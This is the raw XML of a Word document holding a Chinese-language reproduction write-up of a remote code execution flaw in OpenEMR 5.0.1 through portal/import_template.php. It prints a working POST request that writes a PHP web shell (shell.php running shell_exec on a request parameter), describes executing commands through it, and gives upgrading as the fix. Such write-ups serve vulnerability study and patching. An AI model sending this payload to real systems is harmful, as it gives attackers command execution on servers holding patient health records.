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3C9B20AF" w:rsidR="0049271D" w:rsidRPr="00652D7E" w:rsidRDefault="0061269E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OPENEMR 5.0.1远程代码执行漏洞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2B384605" w:rsidR="0049271D" w:rsidRDefault="00AE2C8B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk48313409"/>
      <w:r w:rsidRPr="00652D7E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r w:rsidRPr="00652D7E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>简述</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="465ACB38" w14:textId="26A420FC" w:rsidR="004D7F3F" w:rsidRDefault="004E20C4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 w:rsidRPr="004E20C4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OpenEMR是最受欢迎的开源电子健康记录和医疗实践管理解决方案。通过国际使用的ONC认证，OpenEMR的目标是其专有竞争对手的替代品。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF7A736" w14:textId="6276BC05" w:rsidR="000A619F" w:rsidRDefault="000A619F" w:rsidP="000A619F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652D7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45A9A386" w14:textId="007E3FBA" w:rsidR="000A619F" w:rsidRDefault="004918B2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无需管理员权限，只需要病人账号，登录病人账号之后可通过</w:t>
      </w:r>
      <w:r w:rsidRPr="004918B2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>portal/import_template.php?site=default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>来POST恶意数据从而上传PHP文件，并且上传文件路径固定，文件名不更改，从而导致远程代码执行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42DA2C2E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61269E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>OPENEMR 5.0.1远程代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2DF476" w14:textId="68C6E5F3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D6679D" w:rsidRPr="00D6679D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&lt; 5.0.1 (Patch 4)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4118DA9D" w14:textId="68C131D9" w:rsidR="00E72868" w:rsidRDefault="00657725" w:rsidP="00E72868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657725">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>portal/import_template.php</w:t>
      </w:r>
      <w:r w:rsidR="00E72868">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>关键代码如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71879F76" w14:textId="77777777" w:rsidR="00E72868" w:rsidRDefault="00E72868" w:rsidP="00E72868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BBC87" wp14:editId="314C7BDB">
            <wp:extent cx="5274310" cy="1722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1485" w14:textId="1C368335" w:rsidR="00A03F53" w:rsidRPr="00A21134" w:rsidRDefault="00E72868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 w:rsidRPr="00F2798F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>file_put_contents</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>函数可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F2798F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>将一个字符串写入文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，第一个参数为文件名，第二个参数为字符串，也就是要写入文件的内容。这个两个参数都未作任何处理，从而可以通过写入php文件的形式来执行PHP代码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432CC74E" w14:textId="10F832B8" w:rsidR="00C10855" w:rsidRDefault="00C10855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构造上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBE66BB" w14:textId="7313633F" w:rsidR="00C10855" w:rsidRDefault="00C10855" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10855">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>POST /portal/import_template.php HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D35069" w14:textId="5E63E58B" w:rsidR="00C10855" w:rsidRDefault="00C10855" w:rsidP="006B645E">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C10855">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>site=default&amp;mode=save&amp;docid=shell.php&amp;content=&lt;?php echo shell_exec($_REQUEST["cmd"]); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3969ED6C" w14:textId="320A5BD6" w:rsidR="003E0845" w:rsidRDefault="003E0845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6D3E444" wp14:editId="2CECC752">
            <wp:extent cx="5274310" cy="1958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B7FD" w14:textId="43DD9696" w:rsidR="000F53EF" w:rsidRDefault="00A76822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忘记登录了，</w:t>
      </w:r>
      <w:r w:rsidR="00C10855">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>为方便测试，这里直接登录管理员账号。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF406EB" w14:textId="081B85A6" w:rsidR="00C10855" w:rsidRDefault="00630170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4DA07" wp14:editId="012D409C">
            <wp:extent cx="5274310" cy="1374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6C5" w14:textId="1786BA63" w:rsidR="00711CA1" w:rsidRDefault="009068DE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然后再次构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r w:rsidR="00E16DB9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>，发现成功写入文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65742276" w14:textId="6B18494F" w:rsidR="009068DE" w:rsidRDefault="009068DE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C1443A" wp14:editId="5C2CC3E7">
            <wp:extent cx="5274310" cy="1758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C5A" w14:textId="06E8838E" w:rsidR="00711CA1" w:rsidRPr="00630170" w:rsidRDefault="0054491D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54491D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/portal/shell.php</w:t>
      </w:r>
      <w:r w:rsidR="00B82CE4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>来执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43570972" w14:textId="2751D690" w:rsidR="00C10855" w:rsidRPr="000F53EF" w:rsidRDefault="004F03F0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A1117B" wp14:editId="2A48CD81">
            <wp:extent cx="5274310" cy="20104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5CA7CD4A" w:rsidR="0049271D" w:rsidRPr="00652D7E" w:rsidRDefault="00A009C5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升级版本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CDAA" w14:textId="77777777" w:rsidR="00E60D96" w:rsidRDefault="00E60D96" w:rsidP="002C024D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="363008C7" w14:textId="77777777" w:rsidR="00E60D96" w:rsidRDefault="00E60D96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6CB3" w14:textId="77777777" w:rsidR="00E60D96" w:rsidRDefault="00E60D96" w:rsidP="002C024D">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0C716E08" w14:textId="77777777" w:rsidR="00E60D96" w:rsidRDefault="00E60D96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A619F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0845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18B2"/>
    <w:rsid w:val="0049271D"/>
    <w:rsid w:val="004952A6"/>
    <w:rsid w:val="004A4B88"/>
    <w:rsid w:val="004A66CC"/>
    <w:rsid w:val="004B121C"/>
    <w:rsid w:val="004B2332"/>
    <w:rsid w:val="004B3F11"/>
    <w:rsid w:val="004C6FD5"/>
    <w:rsid w:val="004C7557"/>
    <w:rsid w:val="004D158C"/>
    <w:rsid w:val="004D4835"/>
    <w:rsid w:val="004D525A"/>
    <w:rsid w:val="004D7F3F"/>
    <w:rsid w:val="004E20C4"/>
    <w:rsid w:val="004E61E3"/>
    <w:rsid w:val="004F03F0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491D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1269E"/>
    <w:rsid w:val="00625665"/>
    <w:rsid w:val="00630170"/>
    <w:rsid w:val="00635D23"/>
    <w:rsid w:val="0063704D"/>
    <w:rsid w:val="0065294B"/>
    <w:rsid w:val="00652D7E"/>
    <w:rsid w:val="00657725"/>
    <w:rsid w:val="00664912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E7CDB"/>
    <w:rsid w:val="006F08A3"/>
    <w:rsid w:val="006F4998"/>
    <w:rsid w:val="0070096D"/>
    <w:rsid w:val="00702567"/>
    <w:rsid w:val="007113DE"/>
    <w:rsid w:val="00711CA1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068D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09C5"/>
    <w:rsid w:val="00A01A1F"/>
    <w:rsid w:val="00A03F53"/>
    <w:rsid w:val="00A10BE7"/>
    <w:rsid w:val="00A1203F"/>
    <w:rsid w:val="00A146A6"/>
    <w:rsid w:val="00A15059"/>
    <w:rsid w:val="00A21134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76822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82CE4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0855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6679D"/>
    <w:rsid w:val="00D7251C"/>
    <w:rsid w:val="00D917A2"/>
    <w:rsid w:val="00DA05D5"/>
    <w:rsid w:val="00DA227B"/>
    <w:rsid w:val="00DA2C8C"/>
    <w:rsid w:val="00DB0791"/>
    <w:rsid w:val="00DC317F"/>
    <w:rsid w:val="00DC7012"/>
    <w:rsid w:val="00DE7684"/>
    <w:rsid w:val="00DF44D7"/>
    <w:rsid w:val="00E03C77"/>
    <w:rsid w:val="00E058AC"/>
    <w:rsid w:val="00E0620F"/>
    <w:rsid w:val="00E132DC"/>
    <w:rsid w:val="00E16DB9"/>
    <w:rsid w:val="00E217B7"/>
    <w:rsid w:val="00E338DD"/>
    <w:rsid w:val="00E37157"/>
    <w:rsid w:val="00E44AEC"/>
    <w:rsid w:val="00E453C6"/>
    <w:rsid w:val="00E46233"/>
    <w:rsid w:val="00E52C7E"/>
    <w:rsid w:val="00E60D96"/>
    <w:rsid w:val="00E63E6A"/>
    <w:rsid w:val="00E72868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98F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74</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-30T03:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-08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